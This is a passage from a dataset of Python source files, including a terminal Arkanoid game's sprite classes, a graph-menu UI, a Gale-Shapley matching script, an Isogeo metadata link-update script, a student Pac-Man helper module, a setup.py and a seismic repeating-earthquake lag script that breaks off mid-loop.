All]","sub_path":"heateqnTest3d.py","file_name":"heateqnTest3d.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6936978","text":"# -*- coding: utf-8 -*-\n#\n# cacabric - Arkanoid style game made with python libcaca bindings\n#\n# Copyright (c) 2013 Alex Foulon \n# All Rights Reserved\n#\n# This work is free. You can redistribute it and/or modify it under the\n# terms of the Do What The Fuck You Want To Public License, Version 2,\n# as published by Sam Hocevar. See http://www.wtfpl.net/ for more details.\n#\n\n\"\"\"This module contains game objects\"\"\"\n\n\nimport caca\n\n\n## constants for Sprite objects ###############################################\n##\n\n#sprite size\nSIZE_CHAR = 1\nSIZE_XSMALL = 4\nSIZE_SMALL = 6\nSIZE_NORMAL = 8\nSIZE_LARGE = 10\nSIZE_XLARGE = 12\nSIZE_XXLARGE = 14\n\n#ball anim time settings\nTIME_VALUE = 5000\nANIM_DELAY = 8\n\n#speed factor\nBALL_VX = 1\nBALL_VY = -1\nBONUS_VY = 0.1\nLASER_VY = -0.1\nSHIP_VX = 0.3\n\n#limit numbers\nMAX_MULTIBALL = 3\nMAX_LASER = 3\n\n#bonus types\nBONUS_A, BONUS_B, BONUS_C, BONUS_D, BONUS_E, BONUS_F = list(range(0, 6))\n\n#extra life bonus points\nEXTRA_LIFE_A = 10000\nEXTRA_LIFE_B = 25000\nEXTRA_LIFE_C = 50000\n\n#wall types\nWALL_DEFAULT = 1\nWALL_DOUBLE = 2\nWALL_NOBREAK = 9\n\n#wall bonus points\nWALL_POINTS = 25\n\n\n## Sprite object ##############################################################\n##\n\nclass Sprite(object):\n \"\"\" Common object to represent libcaca sprite.\n \"\"\"\n _delay = ANIM_DELAY\n\n def __init__(self, x, y, ch, *colors):\n \"\"\" Sprite constructor.\n\n :param x: the X coordinate for this object\n :type x: int\n :param y: the Y coordinate for this object\n :type y: int\n :param ch: the character to draw object\n :type ch: str\n\n :param *colors: caca color constant for fg and bg attributes\n :type *colors: caca.COLOR_*\n \"\"\"\n self.x = x\n self.y = y\n self.ch = ch\n\n if len(colors) > 1:\n self.bg = colors[1]\n else:\n self.bg = caca.COLOR_DEFAULT\n\n if len(colors) > 0:\n self.fg = colors[0]\n else:\n self.fg = caca.COLOR_DEFAULT\n\n\n## game sprites ###############################################################\n##\n\nclass Ball(Sprite):\n \"\"\" Object to represent the game ball.\n \"\"\"\n vx = BALL_VX\n vy = BALL_VY\n size = SIZE_CHAR\n movement = False\n onfire = False\n\n def move(self, cv):\n \"\"\" Move sprite ball on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n self.x = self.x + self.vx\n self.y = self.y + self.vy\n\n if self.y < 0:\n self.vy = -self.vy\n self.y = 0\n\n if self.x < 0:\n self.vx = -self.vx\n self.x = 0\n elif self.x + 1 > cv.get_width():\n self.vx = -self.vx\n self.x = cv.get_width() - 1\n\n if self.y >= cv.get_height():\n return False\n\n return True\n\n\nclass Ship(Sprite):\n \"\"\" Object to represent the player ship.\n \"\"\"\n vx = SHIP_VX\n size = SIZE_SMALL\n laser = False\n direction = None\n\n def move(self, cv):\n \"\"\" Move ship sprite on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n if self.direction == caca.KEY_LEFT:\n self.x -= self.vx\n if self.x < 0:\n self.x = 0\n elif self.direction == caca.KEY_RIGHT:\n self.x += self.vx\n if (self.x + self.size) > cv.get_width():\n self.x = (cv.get_width() - self.size)\n\n return True\n\n def grow(self):\n \"\"\" Make ship larger.\n \"\"\"\n self.size += 2\n if self.size > SIZE_XXLARGE:\n self.size = SIZE_XXLARGE\n\n return True\n\n def shrink(self):\n \"\"\" Make ship smaller.\n \"\"\"\n self.size -= 2\n if self.size < 2:\n self.size = 2\n\n return True\n\n def reset(self):\n \"\"\" Reset ship bonus.\n \"\"\"\n self.size = SIZE_SMALL\n self.laser = False\n self.direction = None\n\n\nclass Bonus(Sprite):\n \"\"\" Object to represent a player bonus.\n \"\"\"\n vy = BONUS_VY\n vx = 0\n size = SIZE_CHAR\n\n def move(self, cv):\n \"\"\" Move sprite bonus on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n self.y = self.y + self.vy\n\n if self.y > (cv.get_height() - 1):\n return False\n\n return True\n\n\nclass Laser(Sprite):\n \"\"\" Object to represent a laser shoot.\n \"\"\"\n vy = LASER_VY\n vx = 0\n size = SIZE_CHAR\n\n def move(self, cv):\n \"\"\" Move sprite laser on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n self.y = self.y + self.vy\n\n if self.y < 0:\n return False\n\n return True\n\n\nclass Wall(Sprite):\n \"\"\" Object to represent a game wall.\n \"\"\"\n size = SIZE_SMALL\n bonus = None\n wtype = WALL_DEFAULT\n\n def __init__(self, x, y, ch, *colors):\n \"\"\" Wall constructor.\n \"\"\"\n super(Wall, self).__init__(x, y, ch, *colors)\n self.random()\n\n def random(self):\n \"\"\" Generate random bonus\n \"\"\"\n #generate random bonus for wall\n r = caca.rand(0, 101)\n if r >= 80 and r < 85:\n self.bonus = BONUS_A\n elif r >= 85 and r < 90:\n self.bonus = BONUS_B\n elif r >= 90 and r < 95:\n self.bonus = BONUS_C\n elif r >= 95 and r < 98:\n self.bonus = BONUS_D\n elif r >= 98 and r < 100:\n self.bonus = BONUS_E\n elif r == 100:\n self.bonus = BONUS_F\n","sub_path":"cacabric/sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"258545027","text":"\"\"\"\n @author: Matko Gabriel\n @email: ytgabi98@gmail.com\n @date: 3/3/2018 15:53\n\"\"\"\nfrom directed_graph import UndirectedGraph\n\n\nclass UI(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def printMenu(*args):\n print(\"1. Get the number of vertices\")\n print(\"2. Find if there's an edge between two vertices\")\n print(\"3. Get the in and out degree of a specified vertex\")\n print(\"4. Get the outbound edges of a specified vertex\")\n print(\"5. Get the inbound edges of a specified vertex\")\n print(\"6. Get the endpoints of an edge specified by an EDGE_ID\")\n print(\"7. Retrieve the information attached to an edge\")\n print(\"8. Modify the information attached to an edge\")\n print(\"9. Add vertex\")\n print(\"10. Remove vertex\")\n print(\"11. Add edge\")\n print(\"12. Remove edge\")\n print(\"13. Save graph\")\n print(\"14. Print all connected components\")\n print(\"15. Print menu\")\n print(\"0. Exit app\")\n\n @staticmethod\n def readCommand():\n option = int(input(\">>> \"))\n if option not in range(0, 15):\n raise ValueError(\"Invalid option\")\n\n return option\n\n @staticmethod\n def nrOfVertices(graph: UndirectedGraph):\n print(\"The number of vertices is:\", graph.vertices, \"\\n\")\n\n @staticmethod\n def edgeBetween(graph: UndirectedGraph):\n x = int(input(\" vertexStart : \"))\n y = int(input(\" vertexIn : \"))\n if graph.vertexExists(x) and graph.vertexExists(y):\n if graph.isEdge(x, y):\n print(\"There is an edge!\\n\")\n else:\n print(\"There is not an edge!\\n\")\n else:\n print(\"One or both vertices does not exists!\")\n\n @staticmethod\n def inOutDegree(graph: UndirectedGraph):\n vertex = int(input(\" vertex : \"))\n print(\"OUT degree:\", graph.outDegreeOf(vertex))\n print(\"IN degree:\", graph.inDegreeOf(vertex), \"\\n\")\n\n @staticmethod\n def outboundEdges(graph: UndirectedGraph):\n vertex = int(input(\" vertex : \"))\n print(\"Outbound edges of {0}:\".format(vertex), graph.outboundEdgesOf(vertex), \"\\n\")\n\n @staticmethod\n def inboundEdges(graph: UndirectedGraph):\n vertex = int(input(\" vertex : \"))\n print(\"Inbound edges of {0}:\".format(vertex), graph.inboundEdgesOf(vertex), \"\\n\")\n\n @staticmethod\n def endpointsOfEdge(graph: UndirectedGraph):\n edgeID = int(input(\" edge id : \"))\n print(\"The endpoints of edge with ID {0} are:\".format(edgeID), graph.getEndpointsOf(edgeID), \"\\n\")\n\n @staticmethod\n def retriveCost(graph: UndirectedGraph):\n edgeID = int(input(\" edge id : \"))\n print(\"The cost of edge with ID {0} is:\".format(edgeID), graph.getCostOf(edgeID), \"\\n\")\n\n @staticmethod\n def modifyCost(graph: UndirectedGraph):\n edgeID = int(input(\" edge id : \"))\n newCost = int(input(\" new cost : \"))\n graph.modifyCostOf(edgeID, newCost)\n print(\"The new cost of {0} is {1}\\n\".format(edgeID, graph.getCostOf(edgeID)))\n\n @staticmethod\n def addVertex(graph: UndirectedGraph):\n while True:\n vertex = int(input(\" vertex id : \"))\n if graph.vertexExists(vertex):\n print(\"This vertex already exists!\")\n else:\n graph.addVertex(vertex)\n print(\"The new vertex is named \", graph.vertices)\n break\n\n @staticmethod\n def removeVertex(graph: UndirectedGraph):\n while True:\n vertex = int(input(\" vertex id : \"))\n if graph.vertexExists(vertex):\n graph.removeVertex(vertex)\n print(\"Deletion completed\")\n break\n else:\n print(\"This vertex does not exists!\")\n\n @staticmethod\n def addEdge(graph: UndirectedGraph):\n while True:\n vS = int(input(\" starting edge : \"))\n vE = int(input(\" end edge : \"))\n cost = int(input(\" cost : \"))\n id = int(input(\" id : \"))\n try:\n graph.addEdge(vS, vE, cost, id)\n break\n except Exception as ex:\n print(ex)\n\n @staticmethod\n def removeEdge(graph: UndirectedGraph):\n vS = int(input(\" starting edge : \"))\n vE = int(input(\" end edge : \"))\n graph.removeEdge(vS, vE)\n print(\"Edge {0} -> {1} deleted!\".format(vS, vE))\n\n @staticmethod\n def saveGraph(graph: UndirectedGraph):\n with open(\"newGraph.txt\", \"w+\") as f:\n for vertex in graph.verticesList:\n f.write(str(vertex) + \" \" + str(graph.graphOut[vertex]) + \"\\n\")\n\n @staticmethod\n def exitApp(*args):\n exit(0)\n\n @staticmethod\n def findAllConnectedComponents(graph: UndirectedGraph):\n\n components = {}\n for vertex in graph.verticesList:\n for key in components.keys():\n bfsRez = graph.bfs(vertex)\n components[tuple(bfsRez)] = 1\n\n for component in components.keys():\n print(*component)\n toPrint = set()\n for node in component:\n for nodeOut in graph.graphOut[node]:\n if tuple([nodeOut, node]) not in toPrint:\n toPrint.add(tuple([node, nodeOut]))\n\n if len(toPrint) != 0:\n print(\"Component starting with node:\", component[0], \"->\", *toPrint)\n\n print(\"\\nNumber of connected components: \", len(components))","sub_path":"GRAPHS/PracticalWork2/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"208187409","text":"__author__ = 'reddit.com/u/ullerrm'\n\nimport sys\n\nmale_prefs = dict()\nfemale_prefs = dict()\nfor line in sys.stdin:\n terms = line.strip().replace(',', ' ').split()\n if len(terms) < 2:\n break\n if terms[0].isupper():\n male_prefs[terms[0]] = terms[1:]\n else:\n female_prefs[terms[0]] = terms[1:]\n\nmarried_men = dict()\nengagements = dict()\n\nwhile len(male_prefs) > 0:\n suitor = next(iter(male_prefs))\n woman, male_prefs[suitor] = male_prefs[suitor][0], male_prefs[suitor][1:]\n if woman not in engagements:\n engagements[woman] = suitor\n married_men[suitor] = male_prefs[suitor]\n male_prefs.pop(suitor, None)\n else:\n fiance = engagements[woman]\n if female_prefs[woman].index(suitor) < female_prefs[woman].index(fiance):\n engagements[woman] = suitor\n married_men[suitor] = male_prefs[suitor]\n male_prefs.pop(suitor, None)\n male_prefs[fiance] = married_men[fiance]\n married_men.pop(fiance, None)\n\nfor pair in sorted(list(engagements.items()), key=lambda x: x[1]):\n print(\"({0}; {1})\".format(pair[1], pair[0]))\n","sub_path":"231hard/galeshipley.py","file_name":"galeshipley.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11218697","text":"# -*- coding: UTF-8 -*-\n#! python3\n\n\"\"\"\n Name: Script to...\n Author: Isogeo\n Purpose: Script using isogeo-pysdk to update events.\n\n Python: 3.7+\n\"\"\"\n\n# ##############################################################################\n# ########## Libraries #############\n\n# Standard Library\nimport csv\nfrom os import environ\nfrom pathlib import Path\nfrom timeit import default_timer\nfrom datetime import datetime\nfrom pprint import pprint\n\n# 3rd party\nfrom dotenv import load_dotenv\n\n# Isogeo\nfrom isogeo_pysdk import Isogeo, Link, Metadata\n\n\n# load .env file\nload_dotenv(\"./env/misc.env\", override=True)\n\nBACKUP = int(environ.get(\"BACKUP\"))\nHARD_MODE = int(environ.get(\"HARD_MODE\"))\n\n# #############################################################################\n# ########## Main program ###############\n# #######################################\n\nif __name__ == \"__main__\":\n\n # Shortcuts\n # li_wg_infos = [\n # (\"504f49055abc4d0b9865038fbc99b44b\", \"feb162db72374825a6f4375ed2850556\"),\n # (\"4b729516af434ba0b2c816216440a6ad\", \"bceb8bdefda94cc1856d3a236e36cadc\"),\n # (\"e3a3412cae2843c997862f9d18857dfc\", \"859ed6e5f7fc4fd49a5c589aafc58292\"),\n # (\"80e2a30f471e43f1845a33d98e6a42e3\", \"fef80a89e62242cf815e4078b425a722\"),\n # (\"4baf1fbdf4234d91b52c56978a292938\", \"5c02e033f5504666896b0ad6c5ab1cff\"),\n # ]\n resource_md_uuid = \"feb162db72374825a6f4375ed2850556\"\n li_wg_uuid = [\n \"504f49055abc4d0b9865038fbc99b44b\",\n \"4b729516af434ba0b2c816216440a6ad\",\n \"e3a3412cae2843c997862f9d18857dfc\",\n \"80e2a30f471e43f1845a33d98e6a42e3\",\n \"4baf1fbdf4234d91b52c56978a292938\",\n ]\n li_matching_titles = [\n (\"Métadonnées de produit - BD TOPO® 3.0\", \"Métadonnées de produit - BD TOPO® 3.0\"),\n (\"Métadonnées de produit - ADMIN EXPRESS\", \"Métadonnées de produit - ADMIN EXPRESS 3.0\"),\n (\"Métadonnées de produit - BD ALTI®\", \"Métadonnées de produit - BD ALTI® 2.0\"),\n (\"Métadonnées de produit - BD CARTO®\", \"Métadonnées de produit - BD CARTO® 4.0\"),\n (\"Métadonnées de produit - BD ORTHO®\", \"Métadonnées de produit - BD ORTHO® 2.0\"),\n (\"Métadonnées de produit - Contours... IRIS® 2.1\", \"Métadonnées de produit - CONTOURS... IRIS® 2.1\"),\n (\"Métadonnées de produit - RGE ALTI®\", \"Métadonnées de produit - RGE ALTI® 2.0\"),\n (\"ROUTE 500® - Métadonnées de produit\", \"Métadonnées de produit - ROUTE 500® 3.0\"),\n (\"Métadonnées de produit - RPG\", \"Métadonnées de produit - RPG 2.0\"),\n (\"Métadonnées de produit - Scan 1000®\", \"Métadonnées de produit - SCAN 1000® 2.1\"),\n (\"Métadonnées de produit - Scan 100®\", \"Métadonnées de produit - SCAN 100® 2.0\"),\n (\"Métadonnées de produit - Scan 25®\", \"Métadonnées de produit - Scan 25® 3.1\"),\n ]\n\n # API client instanciation\n isogeo = Isogeo(\n client_id=environ.get(\"ISOGEO_API_USER_LEGACY_CLIENT_ID\"),\n client_secret=environ.get(\"ISOGEO_API_USER_LEGACY_CLIENT_SECRET\"),\n auth_mode=\"user_legacy\",\n auto_refresh_url=\"{}/oauth/token\".format(environ.get(\"ISOGEO_ID_URL\")),\n platform=environ.get(\"ISOGEO_PLATFORM\", \"qa\"),\n )\n isogeo.connect(\n username=environ.get(\"ISOGEO_USER_NAME\"),\n password=environ.get(\"ISOGEO_USER_PASSWORD\"),\n )\n auth_timer = default_timer()\n\n # parent_link = isogeo.metadata.links.get(metadata_id=\"feb162db72374825a6f4375ed2850556\", link_id=\"55ee7a5cf6ce47a98fad2fbf4b07e5ee\")\n # mrn_search = isogeo.search(\n # group=\"80e2a30f471e43f1845a33d98e6a42e3\",\n # whole_results=True,\n # query=\"catalog:dc5fc29e00fc4fcfb6eea10ea8d84065\"\n # )\n # gpmh_search = isogeo.search(\n # group=\"4b729516af434ba0b2c816216440a6ad\",\n # whole_results=True,\n # query=\"catalog:0c13cbfd25cc4e0eacdee4d77c3b7f4b\"\n # )\n # li_mrn_md = [Metadata(**md) for md in mrn_search.results if md.get(\"type\") == \"vectorDataset\"]\n # li_gpmh_md = [Metadata(**md) for md in gpmh_search.results if md.get(\"type\") == \"vectorDataset\"]\n # li_md = li_mrn_md + li_gpmh_md\n # new_link = Link()\n # new_link.link = parent_link.to_dict()\n # new_link.type = \"link\"\n # new_link.kind = \"url\"\n # new_link.actions = parent_link.actions\n # new_link.title = parent_link.title\n # new_link.url = parent_link.url\n # for md in li_md:\n # isogeo.metadata.links.create(\n # metadata=md,\n # link=new_link\n # )\n\n resource_md = isogeo.metadata.get(metadata_id=resource_md_uuid, include=(\"links\",))\n\n report_content = []\n for wg_uuid in li_wg_uuid:\n\n wg = isogeo.workgroup.get(wg_uuid)\n wg_name = wg.contact.get(\"name\")\n print(\"Looking for metadatas who need a new link from {} resource into '{}' workgroup ({}).\".format(resource_md._id, wg_name, wg_uuid))\n\n li_links = [Link(**link) for link in resource_md.links if any(link.get(\"title\") == tup[1] for tup in li_matching_titles)]\n li_old_links_titles = [tup[0] for tup in li_matching_titles if any(link.title == tup[1] for link in li_links)]\n\n wg_search = isogeo.search(\n group=wg_uuid,\n include=(\"links\",),\n whole_results=True\n )\n li_involved_md = [Metadata(**md) for md in wg_search.results if any(lnk.get(\"title\") in li_old_links_titles for lnk in md.get(\"links\")) and md.get(\"type\") != \"resource\"]\n\n for metadata in li_involved_md:\n for lnk in metadata.links:\n old_link_title = lnk.get(\"title\")\n\n if default_timer() - auth_timer >= 6900:\n isogeo.connect(\n username=environ.get(\"ISOGEO_USER_NAME\"),\n password=environ.get(\"ISOGEO_USER_PASSWORD\"),\n )\n auth_timer = default_timer()\n else:\n pass\n\n if old_link_title in li_old_links_titles:\n parent_link_title = [tup[1] for tup in li_matching_titles if tup[0] == old_link_title][0]\n parent_link = [good_link for good_link in li_links if good_link.title == parent_link_title][0]\n\n already_existing = any(old_link.get(\"type\") == \"link\" and old_link.get(\"link\").get(\"url\").strip() == parent_link.to_dict().get(\"url\").strip() for old_link in metadata.links)\n\n if already_existing is False:\n new_link = Link()\n new_link.link = parent_link.to_dict()\n new_link.type = \"link\"\n new_link.kind = \"url\"\n new_link.actions = parent_link.actions\n new_link.title = parent_link.title\n new_link.url = parent_link.url\n report_line = [\n wg_name,\n wg_uuid,\n resource_md.title,\n resource_md_uuid,\n metadata.title,\n metadata._id,\n parent_link_title\n ]\n report_content.append(report_line)\n\n if HARD_MODE:\n created_link = isogeo.metadata.links.create(\n metadata=metadata,\n link=new_link\n )\n else:\n pass\n else:\n pass\n else:\n pass\n\n isogeo.close()\n\n csv_path = Path(\"./scripts/misc/clean_ign_links/csv/link_to_add_{}.csv\".format(int(datetime.now().timestamp())))\n with open(file=csv_path, mode=\"w\", newline=\"\", encoding=\"utf-8\") as csvfile:\n writer = csv.writer(csvfile, delimiter=\";\")\n writer.writerow(\n [\n \"wg_name\",\n \"wg_uuid\",\n \"resource_md_title\",\n \"resource_md_title_uuid\",\n \"target_md_title\",\n \"target_md_uuid\",\n \"new_link_title\",\n ]\n )\n for line in report_content:\n writer.writerow(line)\n","sub_path":"scripts/misc/clean_ign_links/add_new_links.py","file_name":"add_new_links.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"44581798","text":"\"\"\"\n AO PREENCHER ESSE CABEÇALHO COM O MEU NOME E O MEU NÚMERO USP, \n DECLARO QUE SOU O ÚNICO AUTOR E RESPONSÁVEL POR ESSE PROGRAMA. \n TODAS AS PARTES ORIGINAIS DESSE EXERCÍCIO PROGRAMA (EP) FORAM \n DESENVOLVIDAS E IMPLEMENTADAS POR MIM SEGUINDO AS INSTRUÇÕES\n DESSE EP E QUE PORTANTO NÃO CONSTITUEM DESONESTIDADE ACADÊMICA\n OU PLÁGIO. \n DECLARO TAMBÉM QUE SOU RESPONSÁVEL POR TODAS AS CÓPIAS\n DESSE PROGRAMA E QUE EU NÃO DISTRIBUI OU FACILITEI A\n SUA DISTRIBUIÇÃO. ESTOU CIENTE QUE OS CASOS DE PLÁGIO E\n DESONESTIDADE ACADÊMICA SERÃO TRATADOS SEGUNDO OS CRITÉRIOS\n DIVULGADOS NA PÁGINA DA DISCIPLINA.\n ENTENDO QUE EPS SEM ASSINATURA NÃO SERÃO CORRIGIDOS E,\n AINDA ASSIM, PODERÃO SER PUNIDOS POR DESONESTIDADE ACADÊMICA.\n\n Nome : Pedro Henrique Tezotto Delquiaro\n NUSP : 9288582\n Turma: 10\n Prof.: Hitoshi\n\n Referências: Com exceção das rotinas fornecidas no enunciado\n e em sala de aula, caso você tenha utilizado alguma refência,\n liste-as abaixo para que o seu programa não seja considerado\n plágio ou irregular.\n \n Exemplo:\n - O algoritmo Quicksort foi baseado em\n http://www.ime.usp.br/~pf/algoritmos/aulas/quick.html\n\"\"\"\n\n# ======================================================================\n#\n# M Ó D U L O extras\n# \n# Módulo no qual deverão ser colocadas todas as funções\n# adicionais que você escreveu.\n# \n# Inclua também import para o modulo random e também \n# constantes, caso necessário nessas funções\n#\n# ======================================================================\ndef interpretaDirecao(direcao, lista_pacman):\n ''' (str,lista) -> None\n \n Recebe uma letra (a,s,w,z) que representa a direção para a qual\n o jogador deseja mover o PacMan, inserida por ele próprio no input do main, \n e interpreta, inserindo na lista que representa o PacMan, tal direção. \n '''\n \n if direcao == 'a':\n lista_pacman[2] = 'ESQUERDA'\n elif direcao == \"s\":\n lista_pacman[2] = 'DIREITA'\n elif direcao == \"w\":\n lista_pacman[2] = 'CIMA'\n elif direcao == \"z\":\n lista_pacman[2] = 'BAIXO'\n \n \n# ======================================================================\ndef rastroFantasmas(lab, lista_fantasmas): \n ''' (matriz, matriz) -> List\n \n Antes do fantasma movimentar-se, checa o que há na posição em que este irá \n ocupar, para que, quando o fantasma saia daquela posição, o elemento que\n lá estava antes (pacdot ou vazio) seja recolocado em seu lugar. Neste programa,\n esta função é utilizada dentro de uma outra função, a pacman.movimentaFantasmas.\n '''\n PacDotOuVazio = []\n \n \n for f in range(len(lista_fantasmas)):\n \n linha = lista_fantasmas[f][0]\n coluna = lista_fantasmas[f][1]\n \n if lab[linha][coluna] == '.':\n PacDotOuVazio.append('.')\n \n elif lab[linha][coluna] == ' ':\n PacDotOuVazio.append(' ')\n \n else:\n PacDotOuVazio.append(' ')\n \n return PacDotOuVazio\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"codigos/h/Pedro-Henrique-Tezotto-Delquiaro_2139080_assignsubmission_file_extras.py","file_name":"Pedro-Henrique-Tezotto-Delquiaro_2139080_assignsubmission_file_extras.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"88209584","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This file is part of svgis.\n# https://github.com/fitnr/svgis\n\n# Licensed under the GNU General Public License v3 (GPLv3) license:\n# http://opensource.org/licenses/GPL-3.0\n# Copyright (c) 2015, Neil Freeman \n\nfrom setuptools import setup\n\ntry:\n readme = open('README.rst').read()\nexcept IOError:\n readme = ''\n\nwith open('svgis/__init__.py') as i:\n version = next(r for r in i.readlines() if '__version__' in r).split('=')[1].strip('\"\\' \\n')\n\nsetup(\n name='svgis',\n\n version=version,\n\n description='Draw geodata in SVG',\n\n long_description=readme,\n\n keywords='svg gis geojson shapefile',\n\n author='Neil Freeman',\n\n author_email='contact@fakeisthenewreal.org',\n\n url='https://github.com/fitnr/svgis',\n\n license='GNU General Public License v3 (GPLv3)',\n\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Operating System :: OS Independent',\n ],\n\n packages=['svgis'],\n\n install_requires=[\n 'six>=1.7.3,<2',\n 'click>=6.2,<=6.3',\n 'pyproj>=1.9.5,<1.10',\n 'fiona>=1.6.0,<2.0',\n 'fionautil>=0.5.2,<1.0',\n 'tinycss>=0.3,<0.4',\n 'utm>=0.4.0,<1'\n ],\n\n extras_require={\n 'numpy': [''],\n 'clip': ['shapely>=1.5.7'],\n 'inline': [],\n 'simplify': ['visvalingamwyatt>=0.1.1']\n },\n\n test_suite='tests',\n\n tests_require=['six'],\n\n entry_points={\n 'console_scripts': [\n 'svgis=svgis.cli:main',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"393189978","text":"#example of make lag file directly from .sequence file\nimport glob\nimport matplotlib.pyplot as plt\nimport datetime\nimport obspy\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom obspy.taup import TauPyModel\nimport numpy as np\nfrom scipy import signal\nimport os\nimport shutil\nimport time\n\ndef get_staloc(net_sta_key,n_date):\n xml_file=glob.glob(n_date+'/'+'stations/'+net_sta_key+'.xml')[0]\n tmpIN1=open(xml_file,'r').read()\n soup=BeautifulSoup(tmpIN1)\n stlon=float(soup.find_all('longitude' or 'Longitude')[0].text)\n stlat=float(soup.find_all('latitude' or 'Latitude')[0].text)\n return(stlon,stlat)\n\n\ndef cal_CCF(data1,data2):\n #calculate normalize CCF, find max CCC, and lag idx\n tmpccf=signal.correlate(data1,data2,'full')\n auto1=signal.correlate(data1,data1,'full')\n auto2=signal.correlate(data2,data2,'full')\n tmpccf=tmpccf/np.sqrt(np.max(auto1)*np.max(auto2))\n maxCCC=np.max(tmpccf)\n lag=tmpccf.argmax()\n return(maxCCC,lag)\n\n\ndef cal_CCCscore(ndata,sav_ij_date,sav_CCC):\n CCCscore=np.zeros(ndata)\n for i in range(len(sav_ij_date)):\n CCCscore[sav_ij_date[i][0]]=CCCscore[sav_ij_date[i][0]]+sav_CCC[i]\n CCCscore[sav_ij_date[i][1]]=CCCscore[sav_ij_date[i][1]]+sav_CCC[i]\n return(CCCscore)\n\ndef make_legid(longname):\n sav_legend=[]\n for i in longname:\n sav_legend.append(i.split('/')[-1][:12])\n return(sav_legend)\n\n\ndef evloc(Cat_Date,evdate):\n '''\n Cat_Date:catalog date\n evdate:event datetime that you want to search from the catalog\n '''\n tmp_dt_all=Cat_Date-evdate# see which event it is from the catalog\n junk_time=[] #find which one has the min time difference\n for tmp_dt in tmp_dt_all:\n junk_time.append(np.abs(tmp_dt.total_seconds()))\n idx_cat=np.where(junk_time==np.min(junk_time))[0] #now looking for this event\n eqlon=float(A['eqlon'][idx_cat])\n eqlat=float(A['eqlat'][idx_cat])\n eqdep=float(A['eqdep'][idx_cat])\n return(eqlon,eqlat,eqdep)\n\n\ndef read_summary(summary_path):\n #make summary into a dictionary\n IN1=open(summary_path,'r')\n pairs={}\n for line in IN1.readlines():\n elems=line.split()\n pairs[elems[0]]=line.strip()\n IN1.close()\n return pairs\n\n\n\n#-------------------------------------------------------------------------------#\n#pairsf='pairs_BP0.8-2_wind30s.out' #pairs file from read_log.py\n#pairsf='test_pairs.out' #pairs file from read_log.py\n#pairsf='seq12.inp'\npairsf='/Users/timlin/Documents/Project/TestREPEQ/QQQ/output/logs/QQQ.sequence'\n#pairsf='pairs_BP0.8-2_wind30s_one.out' #pairs file from read_log.py\n#eqpath='/Users/timlin/Documents/Project/EQrequest/Hawaii/Hawaii_ALL/' #where you put your waveform data (EQ folders)\neqpath='/Users/timlin/Documents/Project/TestREPEQ/QQQ/waveforms/' #where you put your waveform data (EQ folders)\nsummary_path='/Users/timlin/Documents/Project/TestREPEQ/QQQ/output/logs/QQQ.summary'\n#catalogpath='/Users/timlin/Documents/Project/EQrequest/Hawaii_ALL_M3.dat' #EQ information\ncatalogpath='/Users/timlin/Documents/Project/TestREPEQ/QQQ/catalog/area1.cat' #EQ information\nA=pd.read_csv(catalogpath,header=None,sep=',',names=['time','eqlat','eqlon','eqdep','eqmag','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x'],skiprows=0)\nCat_Date=pd.to_datetime(A['time'],format='%Y-%m-%dT%H:%M:%S.%fZ')#convert time to Datetime format\n\n\n#filt_freq_HR=(0.8,2) #Yu & Wen, (2012)\n#filt_freq_HR=(0.5,2) #correct P arrival\n#filt_freq_HR=(0.5,2) #\n#filt_freq_HR=(1,4)\n#filt_freq_HR=(0.03,0.1)\n#------------parameters for correcting P arrival-----------------#\nfilt_freq_HR=[(0.5,2),(0.5,2)] #set n-step Pwave corrections\np_wind=[(5,15),(2,4)]#window for Pwave correction. Seconds before(positive!) and after theoritical P arrival\nCCC_thres=0.9 #threshold for repEQ from log file\nCCsta_thres=0.9 #threshold for individual station\nmin_num=1 #at least n stations got this threshold\n#-----------parameters for lag measurement after correcting P arrival----------------#\nL_wind=(20,150) #Total(large window) data to be measured. Seconds before, after corrected P arrival\nfilt_L_wind=(0.5,2) #filter for the large window\nS_wind=6 # n seconds for S(small window) of measurement each time\nmov=0.2 # moving seconds\nsampt=0.005 #interpolate to this interval\nWrite_out=True #write measured lag?\n#-------------------------------------------------------------------------------#\nEQfolders=glob.glob(eqpath+'*')\nEQfolders.sort()\n\nIN1=open(pairsf,'r')\n\nif not(os.path.exists('./lag_INFO')):\n os.makedirs('lag_INFO')\n\n#load summary file into dictionary for later check\nSuminfo=read_summary(summary_path) #Suminfo is a dictionary with p1-p2 keys and p1-p2 measurements content\n\nfor line in IN1.readlines():\n 